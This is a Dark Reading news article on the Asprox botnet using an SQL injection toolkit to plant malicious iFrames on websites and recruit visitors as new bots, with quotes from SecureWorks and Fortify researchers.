Bots Use SQL Injection Tool in New Web Attack

Phishing botnet Asprox uses zombies to infect Websites, recruit more bots

Dark Reading logo in a gray background | Dark Reading

A little-known botnet has put a different spin on the recent wave of SQL injection attacks on thousands of Websites: It’s outfitting its bots with its own tool to launch SQL injection attacks on vulnerable sites. (See Third Wave of Web Attacks Not the Last.)

The Asprox botnet, a relatively small botnet known mainly for sending phishing emails, has been spotted in the last few days installing an SQL injection attack tool on its bots. The bots then Google for .asp pages with specific terms -- and then hit the sites found in the search return with SQL injection attacks, says Joe Stewart, director of malware research for SecureWorks, who has documented his findings on the attack.

Stewart says the Asprox botnet’s SQL injection attack is likely a copycat of the recent SQL injection Website attacks from China, which deliver a Trojan that steals online gaming passwords. But this is the first SQL injection attack Stewart has seen using a botnet and a toolkit to do the dirty work. Asprox so far has infected over 1,000 Websites this way, he says.

“I’ve seen bots get other types of infection tools, but not SQL injection” tools, Stewart says. “It’s almost like they noticed the Chinese[-based] attack and copied their code into their own binary for their own attack... The hacks are so similar to the way the other SQL injection attacks are going.”

The attack injects an iFrame into the Website, which then infects visitors with a malicious JavaScript file from the “direct84.com” domain.

Several researchers, including IBM ISS’s X-Force team and Fortify Software, have witnessed copycat SQL injection Website attacks in recent days. “These [SQL injection Website attacks] are not orchestrated together. They are very opportunistic,” says Jacob West, manager of the security research group at Fortify.

Asprox, meanwhile, is also recruiting new bots in its attack -- when a user visits a site infected by Asprox via SQL injection, he or she ends up infected with Asprox botware. Unbeknownst to the user, his or her, machine could, in turn, receive a download of the SQL injection toolkit to continue the cycle. “This has potential to spread like a worm,” Stewart says.

“Its purpose is to infect Websites, and then recruit more bots,” he says. SecureWorks had Asprox at about 15,000 bots last month, but is recounting the botnet to see how much this new attack vector is expanding the botnet. (See SecureWorks Unveils Research on Spamming Botnets.)

Asprox has also thrown in some “scareware” for good measure. “It sends out its spam, but also... posts a warning that there’s spyware found on your computer, [so you should] download this to get rid of it,” Stewart says. “You have to pay for it, so they get your credit card information, too. It’s some additional income on the side,” although the scareware appears to be handled more by an affiliate than by Asprox itself, he says.

Why this particular botnet-borne SQL injection attack? “It’s a new attack vector. It gives them a way to expand their gene pool” and to get a lot bigger, Stewart says. “If you’re a spamming botnet and you spread mainly by emailing links to get users to click on them, you’re always limited to the pool of email addresses you’re already spamming.

“This gives you a fresh set of bots,” he says.

Stewart says Asprox operators are trying to expand the botnet to compete more strongly with others for a piece of the action. “This botnet is emerging and trying to compete,” he says.

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.

About the Author

Kelly Jackson Higgins, Editor-in-Chief, Dark Reading

Kelly Jackson Higgins is the Editor-in-Chief of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise Magazine, Virginia Business magazine, and other major media properties. Jackson Higgins was recently selected as one of the Top 10 Cybersecurity Journalists in the US, and named as one of Folio's 2019 Top Women in Media. She began her career as a sports writer in the Washington, DC metropolitan area, and earned her BA at William & Mary. Follow her on Twitter @kjhiggins.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights